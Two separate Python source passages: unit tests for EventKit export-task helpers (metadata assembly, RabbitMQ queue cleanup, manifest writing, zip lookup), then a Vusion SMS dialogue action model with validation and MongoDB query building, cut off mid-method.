    @patch("eventkit_cloud.tasks.helpers.get_osm_last_update")
    def test_get_last_update(self, mock_get_osm_last_update):
        """'osm' type delegates to get_osm_last_update."""
        test_url = "https://test"
        test_type = "osm"
        get_last_update(test_url, test_type)
        mock_get_osm_last_update.assert_called_once_with(test_url, cert_info=None)

    @patch.object(requests.Session, "get")
    def test_get_osm_last_update(self, mock_get):
        """Reads the overpass /timestamp endpoint; returns None on failure."""
        test_url = "https://test/interpreter"
        expected_url = "https://test/timestamp"
        expected_time = "2017-12-29T13:09:59Z"
        mock_get.return_value.content.decode.return_value = expected_time
        returned_time = get_osm_last_update(test_url)
        mock_get.assert_called_once_with(expected_url)
        self.assertEqual(expected_time, returned_time)
        mock_get.side_effect = Exception("FAIL")
        returned_time = get_osm_last_update(test_url)
        self.assertIsNone(returned_time)

    def test_get_metadata_url(self):
        """OGC services get a GetCapabilities query; others pass through."""
        test_url = "https://test"
        expected_value = "https://test?request=GetCapabilities"
        returned_value = get_metadata_url(test_url, "wcs")
        self.assertEqual(expected_value, returned_value)
        returned_value = get_metadata_url(test_url, "arcgis-raster")
        self.assertEqual(test_url, returned_value)

    @patch("os.path.isfile")
    @patch("eventkit_cloud.tasks.helpers.create_license_file")
    @patch("eventkit_cloud.tasks.helpers.get_metadata_url")
    @patch("eventkit_cloud.tasks.helpers.get_last_update")
    @patch("eventkit_cloud.tasks.helpers.DataProviderTaskRecord")
    def test_get_metadata(
        self,
        mock_DataProviderTaskRecord,
        mock_get_last_update,
        mock_get_metadata_url,
        mock_create_license_file,
        mock_isfile,
    ):
        """get_metadata assembles the full metadata dict from mocked models."""
        run_uid = "1234"
        stage_dir = os.path.join(settings.EXPORT_STAGING_ROOT, str(run_uid))
        expected_layers = ["layer1", "layer2"]
        expected_type = "vector"
        mock_create_license_file.return_value = expected_license_file = {"/license.txt": "/license.txt"}
        mock_isfile.return_value = True
        mock_get_metadata_url.return_value = expected_metadata_url = "https://some.url/metadata"
        # Fill out the behavior for mocked ExportRun by adding a provider task with
        # subtasks for each file in all_file_list
        mock_get_last_update.return_value = expected_last_update = "2018-10-29T04:35:02Z\n"
        mocked_provider_subtasks = []
        sample_file = "F1.gpkg"
        mocked_provider_task = MagicMock()
        mocked_provider_task.name = expected_provider_task_name = "example_name"
        mocked_provider_task.status = TaskState.COMPLETED.value
        mocked_provider_task.provider.slug = expected_provider_slug = "example_slug"
        mocked_provider_task.tasks.filter.return_value = mocked_provider_subtasks
        mocked_provider_task.uid = expected_provider_task_uid = "5678"
        expected_stage_preview_file = f"{stage_dir}/{expected_provider_slug}/preview.jpg"
        expected_archive_preview_file = f"data/{expected_provider_slug}/preview.jpg"
        mocked_provider_task.preview.get_file_path.side_effect = [
            expected_archive_preview_file,
            expected_stage_preview_file,
        ]
        mps = MagicMock()
        mps.result.filename = sample_file
        mps.name = "something EPSG:4326"
        mps.status = TaskState.COMPLETED.value
        mocked_provider_subtasks.append(mps)
        expected_stage_file = f"{stage_dir}/{expected_provider_slug}/{sample_file}"
        expected_archive_file = f"data/{expected_provider_slug}/{sample_file}"
        # This *looks* backwards because the value will get called and resolved before the key in the method.
        mps.result.get_file_path.side_effect = [expected_stage_file, expected_archive_file]
        mocked_data_provider = MagicMock()
        mocked_data_provider.slug = expected_provider_slug
        mocked_data_provider.export_provider_type.type_name = "osm"
        mocked_data_provider.service_copyright = expected_copyright = "mocked_copyright"
        mocked_data_provider.config = f"cert_var: {expected_provider_slug}"
        mocked_data_provider.service_description = expected_data_provider_desc = "example_description"
        mocked_data_provider.layers = expected_layers
        mocked_data_provider.data_type = expected_type
        mocked_data_provider.level_from = expected_level_from = 0
        mocked_data_provider.level_to = expected_level_to = 12
        mocked_provider_task.provider = mocked_data_provider
        mocked_queryset = MagicMock()
        mocked_queryset.return_value = [mocked_provider_task]
        mocked_queryset.first.return_value = mocked_provider_task
        mocked_queryset.__iter__.return_value = [mocked_provider_task]
        mock_DataProviderTaskRecord.objects.select_related().prefetch_related().prefetch_related().filter.return_value = (  # NOQA
            mocked_queryset
        )
        mocked_run = MagicMock()
        mocked_run.uid = run_uid
        mocked_run.job.uid = expected_job_uid = "7890"
        mocked_run.job.include_zipfile = True
        mocked_run.job.name = expected_job_name = "mocked_job_name"
        mocked_run.job.bounds_geojson = expected_aoi = "mocked_job_aoi"
        mocked_run.job.extents = expected_extents = [-1, -1, 0, 0]
        mocked_run.job.event = expected_project_name = "mocked_project_name"
        mocked_run.job.description = expected_job_desc = "mocked_job_desc"
        mocked_run.job.projections.all.return_value = [Mock(srid=4326)]
        mocked_run.data_provider_task_records.all.return_value = [mocked_provider_task]
        mocked_provider_task.run = mocked_run
        expected_date = timezone.now().strftime("%Y%m%d")
        file_ext = os.path.splitext(sample_file)[1]
        include_files = {
            expected_stage_preview_file: expected_archive_preview_file,
            expected_stage_file: expected_archive_file,
        }
        include_files.update(expected_license_file)
        expected_metadata = {
            "aoi": expected_aoi,
            "bbox": expected_extents,
            "data_sources": {
                "example_slug": {
                    "copyright": expected_copyright,
                    "description": expected_data_provider_desc,
                    "files": [
                        {
                            "file_path": f"data/{expected_provider_slug}/{sample_file}",
                            "file_ext": file_ext,
                            "full_file_path": os.path.join(stage_dir, expected_provider_slug, sample_file),
                            "projection": "4326",
                        }
                    ],
                    "last_update": expected_last_update,
                    "metadata": expected_metadata_url,
                    "name": expected_provider_task_name,
                    "slug": expected_provider_slug,
                    "type": expected_type,
                    "uid": expected_provider_task_uid,
                    "layers": expected_layers,
                    "level_from": expected_level_from,
                    "level_to": expected_level_to,
                }
            },
            "date": expected_date,
            "description": expected_job_desc,
            "has_elevation": False,
            "has_raster": False,
            "has_vector": True,
            "include_files": include_files,
            "name": expected_job_name,
            "project": expected_project_name,
            "projections": [4326],
            "run_uid": run_uid,
            "url": f"{getattr(settings, 'SITE_URL')}/status/{expected_job_uid}",
        }
        returned_metadata = get_metadata([mocked_provider_task.uid])
        self.maxDiff = None
        self.assertEqual(expected_metadata, returned_metadata)

    def test_get_arcgis_metadata(self):
        """Internal bookkeeping keys are stripped for the arcgis bundle."""
        example_metadata = {
            "stuff": "test",
            "include_files": "files",
            "data_sources": {"osm": {"files": [{"data": "here", "full_file_path": "here"}]}},
        }
        expected_metadata = {"stuff": "test", "data_sources": {"osm": {"files": [{"data": "here"}]}}}
        self.assertEqual(expected_metadata, get_arcgis_metadata(example_metadata))

    @requests_mock.Mocker()
    def test_get_all_rabbitmq_objects(self, requests_mocker):
        """Objects are collected across pages; bad responses raise."""
        example_api = "http://example/api/"
        queues = "queues"
        expected_queues = [{"name": "queue1"}, {"name": "queue2"}]
        res1 = {"page_count": 2, "page": 1, "items": [{"name": "queue1"}]}
        res2 = {"page_count": 2, "page": 2, "items": [{"name": "queue2"}]}
        requests_mocker.get(example_api + queues + "?page=1&page_size=100&pagination=true", text=json.dumps(res1))
        requests_mocker.get(example_api + queues + "?page=2&page_size=100&pagination=true", text=json.dumps(res2))
        result = get_all_rabbitmq_objects(example_api, queues)
        self.assertEqual(result, expected_queues)
        with self.assertRaises(Exception):
            requests_mocker.get(example_api + queues + "?page=1&page_size=100&pagination=true", text="ERROR")
            get_all_rabbitmq_objects(example_api, "WRONG")

    @patch("eventkit_cloud.tasks.helpers.get_all_rabbitmq_objects")
    def test_delete_rabbit_objects(self, mock_get_all_rabbitmq_objects):
        """Only idle queues are deleted unless force=True; exchanges optional."""
        example_api = "https://example/api"
        example_vhost = "abcd_vhost"
        example_queues = [
            {"name": "queue1", "consumers": 0, "messages": 0, "vhost": example_vhost},
            {"name": "queue2", "consumers": 1, "messages": 1, "vhost": example_vhost},
        ]
        example_exchanges = [
            {"name": "exchange1", "vhost": example_vhost},
            {"name": "exchange2", "vhost": example_vhost},
        ]
        return_values = {"queues": example_queues, "exchanges": example_exchanges}
        mock_get_all_rabbitmq_objects.side_effect = lambda api, rabbit_class: return_values[rabbit_class]
        # Deletes only the empty queue
        with requests_mock.Mocker() as requests_mocker:
            requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
            delete_rabbit_objects(example_api)
            mock_get_all_rabbitmq_objects.assert_called_once_with(example_api, "queues")
            self.assertEqual(requests_mocker.call_count, 1)
            mock_get_all_rabbitmq_objects.reset_mock()
        # Deletes only the empty queue and exchanges
        with requests_mock.Mocker() as requests_mocker:
            requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
            requests_mocker.delete(f"{example_api}/exchanges/{example_vhost}/{example_exchanges[0]['name']}")
            requests_mocker.delete(f"{example_api}/exchanges/{example_vhost}/{example_exchanges[1]['name']}")
            delete_rabbit_objects(example_api, rabbit_classes=["queues", "exchanges"])
            mock_get_all_rabbitmq_objects.assert_has_calls(
                [call(example_api, "queues"), call(example_api, "exchanges")]
            )
            self.assertEqual(requests_mocker.call_count, 3)
            mock_get_all_rabbitmq_objects.reset_mock()
        # Deletes all queues
        with requests_mock.Mocker() as requests_mocker:
            requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[0]['name']}")
            requests_mocker.delete(f"{example_api}/queues/{example_vhost}/{example_queues[1]['name']}")
            delete_rabbit_objects(example_api, force=True)
            mock_get_all_rabbitmq_objects.assert_called_once_with(example_api, "queues")
            self.assertEqual(requests_mocker.call_count, 2)
            mock_get_all_rabbitmq_objects.reset_mock()

    @patch("eventkit_cloud.tasks.helpers.get_all_rabbitmq_objects")
    def test_get_message_count(self, mock_get_all_rabbitmq_objects):
        """The message count of the matching queue is returned."""
        queue = "queue2"
        expected_queues = [{"name": "queue1"}, {"name": "queue2", "messages": "5"}]
        expected_messages = "5"
        mock_get_all_rabbitmq_objects.return_value = expected_queues
        messages = get_message_count(queue)
        self.assertEqual(messages, expected_messages)

    @patch("builtins.open")
    def test_get_data_package_manifest(self, mock_open):
        """Manifest XML is written to the staging dir.

        BUGFIX: this method was named ``get_data_package_manifest`` and was
        therefore never collected/run by the test runner.
        """
        example_name = "example_name"
        example_uid = "97f0d96a-ee1f-482e-9fe8-e6f716ed3144"
        example_file_path = "data/osm_tiles/test-4326-osm_tiles-20201112-u.gpkg"
        example_ignored_file = "ignore/me.txt"
        # TODO: Use lxml tools if installing in the future to make this diff be based on structure not text value.
        expected_xml = f"""<MissionPackageManifest version="2">
  <Configuration>
    <Parameter name="uid" value="{example_uid}"/>
    <Parameter name="name" value="{example_name}"/>
  </Configuration>
  <Contents>
    <Content ignore="false" zipEntry="{example_file_path}">
      <Parameter name="contentType" value="External Native Data"/>
    </Content>
    <Content ignore="true" zipEntry="{example_ignored_file}"/>
    <Content ignore="false" zipEntry="manifest/manifest.xml"/>
  </Contents>
</MissionPackageManifest>"""
        example_metadata = {
            "name": example_name,
            "url": "http://cloud.eventkit.test/status/b4e7e799-8eb6-4d52-98b4-3fcaed619cc9",
            "description": "test",
            "project": "test",
            "projections": [4326],
            "date": "20201112",
            "run_uid": example_uid,
            "data_sources": {
                "osm_tiles": {
                    "uid": "cce7742e-8916-4b69-b5fe-d30baec09199",
                    "slug": "osm_tiles",
                    "name": "OpenStreetMap Tiles",
                    "files": [
                        {
                            "file_path": example_file_path,
                            "full_file_path": f"/{example_file_path}",
                            "file_ext": ".gpkg",
                            "projection": "4326",
                        }
                    ],
                    "type": "raster",
                    "description": "OSM Description",
                    "last_update": None,
                    "metadata": "https://osm.url/tiles/default_pc/{z}/{x}/{y}.png",
                    "copyright": "OpenStreetMap Contributors",
                }
            },
            "bbox": (1, 1, 1.5, 1.5),
            "aoi": '{"type": "FeatureCollection", "crs": {"type": "name", "properties": {"name": "EPSG:4326"}}, '
            '"features": []}',
            "has_raster": True,
            "has_elevation": False,
            "include_files": [example_ignored_file],
        }
        get_data_package_manifest(example_metadata, ignore_files=[example_ignored_file])
        expected_output_file = os.path.join(settings.EXPORT_STAGING_ROOT, str(example_uid), "manifest.xml")
        mock_open.assert_called_once_with(expected_output_file, "w")
        mock_open().__enter__().write.assert_called_once_with(expected_xml)

    @patch("eventkit_cloud.tasks.helpers.set_cache_value")
    @patch("django.db.connection.close")
    def test_update_progress(self, mock_close, mock_set_cache_value):
        """Progress and estimated finish are pushed into the cache."""
        uid = "1234"
        estimated = timezone.now()
        update_progress(uid, progress=50, estimated_finish=estimated)
        mock_close.assert_called_once()
        mock_set_cache_value.assert_has_calls(
            [
                call(uid=uid, attribute="progress", model_name="ExportTaskRecord", value=50),
                call(uid=uid, attribute="estimated_finish", model_name="ExportTaskRecord", value=estimated),
            ]
        )

    def test_find_in_zip(self):
        """A file with the requested extension is located inside the zip."""
        zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_1.zip")
        found_file = find_in_zip(
            zip_filepath=zip_filepath,
            stage_dir="example/dir",
            extension="json",
            archive_extension="zip",
            matched_files=[],
            extract=False,
        )
        self.assertEqual(found_file, f"/vsizip/{zip_filepath}/test_geojson.json")

    def test_find_in_zip_no_extension(self):
        """Without an extension, the first candidate file is returned."""
        zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_1.zip")
        found_file = find_in_zip(
            zip_filepath=zip_filepath, stage_dir="example/dir", archive_extension="zip", matched_files=[], extract=False
        )
        self.assertEqual(found_file, f"/vsizip/{zip_filepath}/test_csv.csv")

    def test_find_in_zip_no_extension_nested_folder(self):
        """Nested folders inside the archive are searched as well."""
        zip_filepath = os.path.join(os.path.dirname(__file__), "files/test_zip_2.zip")
        found_file = find_in_zip(
            zip_filepath=zip_filepath, stage_dir="example/dir", archive_extension="zip", matched_files=[], extract=False
        )
        self.assertEqual(found_file, f"/vsizip/{zip_filepath}/inner/inner_inner/inner_inner_inner/test_geojson.json")
|
|
import re
from math import ceil
from vusion.error import MissingField, VusionError, InvalidField, MissingData
from vusion.persist import Model
from vusion.persist.participant.participant import Participant
from vusion.const import TAG_REGEX, LABEL_REGEX
from vusion.utils import clean_phone
from vumi.log import log
class Action(Model):
    """Base model for dialogue actions.

    Concrete subclasses set ACTION_TYPE and may extend validate_fields().
    An action can carry an optional condition: when 'set-condition' is
    'condition', the 'subconditions' list combined via
    'condition-operator' decides which participants the action applies
    to (see get_condition_mongodb()).
    """

    MODEL_TYPE = 'action'
    MODEL_VERSION = '2'
    ACTION_TYPE = None

    # TODO: add subcondition validation depending on the action type.
    # Field specs consumed by Model._validate(); each entry maps a rule
    # name to a predicate evaluated against the payload.
    fields = {
        'subconditions': {
            'required': False,
            'valid_conditions': lambda v: getattr(v, 'valid_conditions')(),
        },
        'condition-operator': {
            'required': False,
            'valid_value': lambda v: v['condition-operator'] in ['all-subconditions', 'any-subconditions']
        },
        'set-condition': {
            'required': True,
            'valid_value': lambda v: v['set-condition'] in [None, 'condition'],
            # When 'condition' is set, the operator and subconditions
            # become mandatory.
            'required_subfield': lambda v: getattr(v, 'required_subfields')(
                v['set-condition'],
                {'condition':['subconditions', 'condition-operator']}),
        },
        'type-action': {
            'required': True,
            'valid_value': lambda v: v['type-action'] in [
                'optin',
                'optout',
                'reset',
                'feedback',
                'unmatching-answer',
                'tagging',
                'enrolling',
                'profiling',
                'delayed-enrolling',
                'proportional-tagging',
                'proportional-labelling',
                'remove-question',
                'remove-reminders',
                'remove-deadline',
                'offset-conditioning',
                'message-forwarding',
                'url-forwarding',
                'sms-forwarding',
                'sms-invite',
                'sms-mo',
                'save-content-variable-table']},
    }

    # Fields every subcondition entry must carry.
    subcondition_fields = {
        'subcondition-field': {
            'required': True,
        },
        'subcondition-operator': {
            'required': True,
        },
        'subcondition-parameter': {
            'required': True,
        }
    }

    # Allowed operators per subcondition field, mapped to the regex the
    # subcondition parameter must match.
    subcondition_values = {
        'tagged':{
            'with': '.*',
            'not-with': '.*'},
        'labelled':{
            'with': '.*:.*',
            'not-with': '.*:.*'},
    }

    def __init__(self, **kwargs):
        # Force the payload's type-action to match the concrete class.
        kwargs.update({'type-action':self.ACTION_TYPE})
        super(Action, self).__init__(**kwargs)

    def upgrade(self, **kwargs):
        """Migrate a version-1 payload to version 2 (adds 'set-condition')."""
        if kwargs['model-version'] == '1':
            kwargs['set-condition'] = None
            kwargs['model-version'] = '2'
        return kwargs

    def __eq__(self, other):
        # Two actions are equal when their payloads are equal.
        if isinstance(other, Action):
            return self.payload == other.payload
        return False

    def __str__(self):
        return "Do:%s payload=%s" % (self.get_type(), repr(self.payload))

    def __repr__(self):
        return str(self)

    def __getitem__(self, key):
        # Dict-style access proxies straight to the payload.
        return self.payload[key]

    def __setitem__(self, key, value):
        self.payload[key] = value

    def process_fields(self, fields):
        """Hook for subclasses; the base class stores fields unchanged."""
        return fields

    def validate_fields(self):
        """Run the field specs in `fields` against this action."""
        self._validate(self, self.fields)

    def valid_conditions(self):
        """Validate every subcondition's fields and values; True if none set."""
        if not 'subconditions' in self:
            return True
        for subcondition in self['subconditions']:
            self._validate(subcondition, self.subcondition_fields)
            self.valid_subcondition_value(subcondition)
        return True

    def valid_subcondition_value(self, subconditon):
        """Check field, operator and parameter against subcondition_values.

        Raises InvalidField on the first entry that does not match.
        """
        if not subconditon['subcondition-field'] in self.subcondition_values:
            raise InvalidField("%s=%s is not valid" % ('subcondition-field', subconditon['subcondition-field']))
        operators = self.subcondition_values[subconditon['subcondition-field']]
        if not subconditon['subcondition-operator'] in operators:
            raise InvalidField("%s=%s is not valid" % ('subcondition-operator', subconditon['subcondition-operator']))
        # The operator maps to a regex the parameter must satisfy.
        parameter_regex = re.compile(operators[subconditon['subcondition-operator']])
        if not parameter_regex.match(subconditon['subcondition-parameter']):
            raise InvalidField("%s=%s is not valid" % ('subcondition-parameter', subconditon['subcondition-parameter']))

    def get_type(self):
        """Return the concrete ACTION_TYPE string."""
        return self.ACTION_TYPE

    def assert_field_present(self, *fields):
        """Raise MissingField unless every named field is in the payload."""
        for field in fields:
            if field not in self.payload:
                raise MissingField(field)

    def assert_subfield_present(self, field, *subfields):
        """Raise MissingField unless field's value has every subfield."""
        for subfield in subfields:
            if subfield not in self[field]:
                raise MissingField(subfield)

    def assert_list_field_present(self, elements, *fields):
        """Raise MissingField unless every element carries every field."""
        if elements is None:
            return
        for element in elements:
            for field in fields:
                if field not in element:
                    raise MissingField(field)

    def get_as_dict(self):
        """Return a plain-dict copy of the payload incl. 'type-action'."""
        action_dict = {'type-action': self.get_type()}
        for key in self.payload:
            action_dict[key] = self.payload[key]
        return action_dict

    def has_condition(self):
        return self['set-condition'] == 'condition'

    def get_condition_mongodb(self):
        """Translate the subconditions into a MongoDB query (or {})."""
        if not self.has_condition():
            return {}
        return Participant.from_conditions_to_query(
            self['condition-operator'], self['subconditions'])

    def get_condition_mongodb_for(self, phone, session_id):
        """Return the condition query narrowed to one participant session."""
        query = self.get_condition_mongodb()
        # Merge the participant selector into the existing query without
        # breaking an $and/$or structure produced by the conditions.
        if '$and' in query:
            query['$and'].insert(0, {'phone': phone, 'session-id': session_id})
        elif '$or' in query:
            query = {'$and': [{'phone': phone,'session-id': session_id},
                              query]}
        else:
            query.update({'phone': phone,
                          'session-id': session_id})
        return query
class OptinAction(Action):
    """'optin' action; requires no fields beyond the base ones."""

    ACTION_TYPE = 'optin'

    def validate_fields(self):
        super(OptinAction, self).validate_fields()
class OptoutAction(Action):
    """'optout' action; requires no fields beyond the base ones."""

    ACTION_TYPE = 'optout'

    def validate_fields(self):
        super(OptoutAction, self).validate_fields()
class ResetAction(Action):
    """'reset' action; optionally preserves selected tags and labels."""

    ACTION_TYPE = 'reset'

    def before_validate(self):
        # Default the optional keep-lists so validation always sees them.
        if 'keep-tags' not in self.payload:
            self['keep-tags'] = None
        if 'keep-labels' not in self.payload:
            self['keep-labels'] = None
        super(ResetAction, self).before_validate()

    def validate_fields(self):
        super(ResetAction, self).validate_fields()
        self.assert_field_present('keep-tags', 'keep-labels')

    def get_keep_tags(self, participant_tags):
        """Return the participant tags listed in 'keep-tags' (possibly [])."""
        if not participant_tags:
            return []
        keep = self['keep-tags']
        if not keep:
            return []
        return [tag for tag in participant_tags if tag in keep]

    def get_keep_labels(self, participant_labels):
        """Return the participant labels whose name is in 'keep-labels'."""
        if not participant_labels:
            return []
        keep = self['keep-labels']
        if not keep:
            return []
        return [label for label in participant_labels if label['label'] in keep]
class FeedbackAction(Action):
    """'feedback' action; requires a 'content' field."""

    ACTION_TYPE = 'feedback'

    def validate_fields(self):
        super(FeedbackAction, self).validate_fields()
        self.assert_field_present('content')
class SmsMoAction(Action):
    """'sms-mo' action; requires an 'mo-content' field."""

    ACTION_TYPE = 'sms-mo'

    def validate_fields(self):
        super(SmsMoAction, self).validate_fields()
        self.assert_field_present('mo-content')
class UnMatchingAnswerAction(Action):
    """'unmatching-answer' action; requires an 'answer' field."""

    ACTION_TYPE = 'unmatching-answer'

    def validate_fields(self):
        super(UnMatchingAnswerAction, self).validate_fields()
        self.assert_field_present('answer')
class TaggingAction(Action):
    """'tagging' action; requires a 'tag' field."""

    ACTION_TYPE = 'tagging'

    def validate_fields(self):
        super(TaggingAction, self).validate_fields()
        self.assert_field_present('tag')
class EnrollingAction(Action):
    """'enrolling' action; requires an 'enroll' field."""

    ACTION_TYPE = 'enrolling'

    def validate_fields(self):
        super(EnrollingAction, self).validate_fields()
        self.assert_field_present('enroll')
class DelayedEnrollingAction(Action):
    """'delayed-enrolling' action; requires 'enroll' plus an
    'offset-days' field carrying 'days' and 'at-time' subfields."""

    ACTION_TYPE = 'delayed-enrolling'

    def validate_fields(self):
        super(DelayedEnrollingAction, self).validate_fields()
        self.assert_field_present(
            'enroll',
            'offset-days')
        self.assert_subfield_present(
            'offset-days',
            'days',
            'at-time')
class ProfilingAction(Action):
    """'profiling' action; requires 'label' and 'value' fields."""

    ACTION_TYPE = 'profiling'

    def validate_fields(self):
        super(ProfilingAction, self).validate_fields()
        self.assert_field_present('label', 'value')
class RemoveQuestionAction(Action):
    """'remove-question' action; targets one interaction of a dialogue."""

    ACTION_TYPE = 'remove-question'

    def validate_fields(self):
        super(RemoveQuestionAction, self).validate_fields()
        self.assert_field_present('dialogue-id', 'interaction-id')
class RemoveRemindersAction(Action):
    """'remove-reminders' action; targets one interaction of a dialogue."""

    ACTION_TYPE = 'remove-reminders'

    def validate_fields(self):
        super(RemoveRemindersAction, self).validate_fields()
        self.assert_field_present('dialogue-id', 'interaction-id')
class RemoveDeadlineAction(Action):
    """'remove-deadline' action; targets one interaction of a dialogue."""

    ACTION_TYPE = 'remove-deadline'

    def validate_fields(self):
        super(RemoveDeadlineAction, self).validate_fields()
        self.assert_field_present('dialogue-id', 'interaction-id')
class OffsetConditionAction(Action):
    """'offset-conditioning' action; targets one interaction of a dialogue."""

    ACTION_TYPE = 'offset-conditioning'

    def validate_fields(self):
        super(OffsetConditionAction, self).validate_fields()
        self.assert_field_present('interaction-id', 'dialogue-id')
class ProportionalAction(Action):
    """Marker base class for weight-proportional actions."""
    pass
class ProportionalTagging(ProportionalAction):
    """Pick a tag so that tag counts follow the configured weights."""

    ACTION_TYPE = 'proportional-tagging'

    def validate_fields(self):
        super(ProportionalTagging, self).validate_fields()
        self.assert_field_present('proportional-tags')
        self.assert_list_field_present(self['proportional-tags'], 'tag', 'weight')

    def get_proportional_tags(self):
        return self['proportional-tags']

    def set_tag_count(self, tag, count):
        """Store the current participant count next to the matching tag."""
        for index, entry in enumerate(self['proportional-tags']):
            if entry['tag'] == tag:
                entry.update({'count': count})
                self['proportional-tags'][index] = entry
                break

    def get_tags(self):
        """Return the plain list of configured tag names."""
        return [entry['tag'] for entry in self['proportional-tags']]

    def get_totals(self):
        """Return (sum of weights, sum of known counts)."""
        entries = self['proportional-tags']
        weight_total = sum(int(entry['weight']) or 0 for entry in entries)
        count_total = sum(entry.get('count', 0) for entry in entries)
        return weight_total, count_total

    def get_tagging_action(self):
        """Return a TaggingAction for the first under-represented tag."""
        weight_total, count_total = self.get_totals()
        for entry in self['proportional-tags']:
            weight_tag = int(entry['weight'])
            count_expected = ceil(count_total * weight_tag / weight_total)
            count_tag = entry.get('count', 0)
            if count_expected >= count_tag:
                return TaggingAction(**{'tag': entry['tag']})
        # Fallback: default to the first configured tag.
        return TaggingAction(**{'tag': self['proportional-tags'][0]['tag']})
class ProportionalLabelling(ProportionalAction):
    """Pick a label value so that counts follow the configured weights."""

    ACTION_TYPE = 'proportional-labelling'

    def validate_fields(self):
        super(ProportionalLabelling, self).validate_fields()
        self.assert_field_present('proportional-labels')
        self.assert_list_field_present(self['proportional-labels'], 'label-value', 'weight')
        self.assert_field_present('label-name')

    def get_proportional_labels(self):
        return self['proportional-labels']

    def get_label_name(self):
        return self['label-name']

    def set_count(self, label_value, count):
        """Store the current count next to the matching label value."""
        for index, entry in enumerate(self['proportional-labels']):
            if entry['label-value'] == label_value:
                entry.update({'count': count})
                self['proportional-labels'][index] = entry
                break

    def get_labels(self):
        """Return {label, value} dicts for every configured label value."""
        return [{'label': self['label-name'],
                 'value': entry['label-value']}
                for entry in self['proportional-labels']]

    def get_totals(self):
        """Return (sum of weights, sum of known counts)."""
        entries = self['proportional-labels']
        weight_total = sum(int(entry['weight']) or 0 for entry in entries)
        count_total = sum(entry.get('count', 0) for entry in entries)
        return weight_total, count_total

    def get_labelling_action(self):
        """Return a ProfilingAction for the first under-represented value."""
        weight_total, count_total = self.get_totals()
        for entry in self['proportional-labels']:
            weight_label = int(entry['weight'])
            count_expected = ceil(count_total * weight_label / weight_total)
            count_label = entry.get('count', 0)
            if count_expected >= count_label:
                return ProfilingAction(**{
                    'label': self['label-name'],
                    'value': entry['label-value']})
        # Fallback: default to the first configured label value.
        return ProfilingAction(**{
            'label': self['label-name'],
            'value': self['proportional-labels'][0]['label-value']})
class UrlForwarding(Action):
    """Action forwarding a message to a URL; validation only requires
    the target 'forward-url' field to be present."""

    ACTION_TYPE = 'url-forwarding'

    def validate_fields(self):
        super(UrlForwarding, self).validate_fields()
        self.assert_field_present('forward-url')
class SmsForwarding(Action):
    """Action that forwards an SMS to other participants selected by
    tags, labels and an optional condition on the incoming message."""

    ACTION_TYPE = 'sms-forwarding'

    def before_validate(self):
        # Older payloads predate this field; default it so validation passes.
        if not 'set-forward-message-condition' in self.payload:
            self['set-forward-message-condition'] = None
        super(SmsForwarding, self).before_validate()

    def validate_fields(self):
        super(SmsForwarding, self).validate_fields()
        self.assert_field_present(
            'forward-to',
            'forward-content',
            'set-forward-message-condition')

    def get_forward_message_condition(self, context):
        """Build the query condition derived from the incoming message.

        For the 'phone-number' condition type, the second word of the
        message is used as the phone to match (empty string when absent).
        """
        if self['set-forward-message-condition'] is None:
            return {}
        if self['forward-message-condition-type'] == 'phone-number':
            second_word = context.get_message_second_word()
            if second_word is None:
                return {'phone': ''}
            return {'phone': clean_phone(second_word)}
        return {}

    def has_no_participant_feedback(self):
        """True only when a condition is set and a non-empty
        'forward-message-no-participant-feedback' message is configured."""
        if self['set-forward-message-condition'] is None:
            return False
        if ('forward-message-no-participant-feedback' not in self.payload
                or self['forward-message-no-participant-feedback'] is None
                or self['forward-message-no-participant-feedback'] == ''):
            return False
        return True

    def get_no_participant_feedback(self):
        if 'forward-message-no-participant-feedback' in self:
            return self['forward-message-no-participant-feedback']
        return None

    def get_query_selector(self, participant, context):
        """Build the participant-lookup query for this forward.

        Raises MissingData when a [participant.<label>] placeholder in
        'forward-to' cannot be resolved for the given participant.
        """
        # Replace each [participant.<label>] placeholder with the
        # participant's value for that label.
        customized_selector = (self['forward-to'] or '')
        custom_regexp = re.compile(r'\[participant.(?P<key1>[^\.\]]+)\]')
        matches = re.finditer(custom_regexp, customized_selector)
        for match in matches:
            # finditer never yields None, so the old None guard was dead code.
            match = match.groupdict()
            if participant is None:
                raise MissingData('No participant supplied for this message.')
            participant_label_value = participant.get_data(match['key1'])
            if not participant_label_value:
                raise MissingData("Participant %s doesn't have a label %s" %
                                  (participant['phone'], match['key1']))
            replace_match = '[participant.%s]' % match['key1']
            # BUG FIX: accumulate substitutions on customized_selector.
            # Restarting from self['forward-to'] on every match discarded
            # all but the last placeholder replacement.
            customized_selector = customized_selector.replace(
                replace_match, participant_label_value)
        selectors = [selector.strip() for selector in customized_selector.split(",")]
        # Build the query: message condition, an open session, and never
        # the sender themself.
        query = self.get_forward_message_condition(context)
        self.add_condition_to_query(query, {'session-id': {'$ne': None}})
        self.add_condition_to_query(query, {'phone': {'$ne': participant['phone']}})
        for selector in selectors:
            if re.match(TAG_REGEX, selector):
                self.add_condition_to_query(query, {'tags': selector})
            elif re.match(LABEL_REGEX, selector):
                profile = selector.split(':')
                self.add_condition_to_query(query, {'profile': {'$elemMatch': {'label': profile[0], 'value': profile[1]}}})
        return query

    def add_condition_to_query(self, query, conditions):
        """Merge conditions into query; a duplicated key is moved under a
        MongoDB '$and' clause so both constraints are kept."""
        for key, value in conditions.iteritems():
            if key in query:
                if '$and' in query:
                    query['$and'].append({key: value})
                else:
                    query['$and'] = [{key: query[key]}, {key: value}]
                    query.pop(key, None)
            else:
                query[key] = value
class SmsInviteAction(Action):
    """Action sending an SMS invitation; validates the invite content,
    the tag applied to invitees and the feedback sent to the inviter."""

    ACTION_TYPE = 'sms-invite'

    def validate_fields(self):
        super(SmsInviteAction, self).validate_fields()
        self.assert_field_present(
            'invite-content',
            'invitee-tag',
            'feedback-inviter')
class SaveContentVariableTable(Action):
    """Action saving an answer into a content-variable table cell
    addressed by row key values and a column header."""

    ACTION_TYPE = 'save-content-variable-table'

    def validate_fields(self):
        super(SaveContentVariableTable, self).validate_fields()
        self.assert_field_present(
            'scvt-attached-table',
            'scvt-row-keys',
            'scvt-col-key-header',
            'scvt-col-extras')
        self.assert_list_field_present(
            self['scvt-row-keys'], *['scvt-row-header', 'scvt-row-value'])
        self.assert_list_field_present(
            self['scvt-col-extras'], *['scvt-col-extra-header', 'scvt-col-extra-value'])

    def _get_row_match(self):
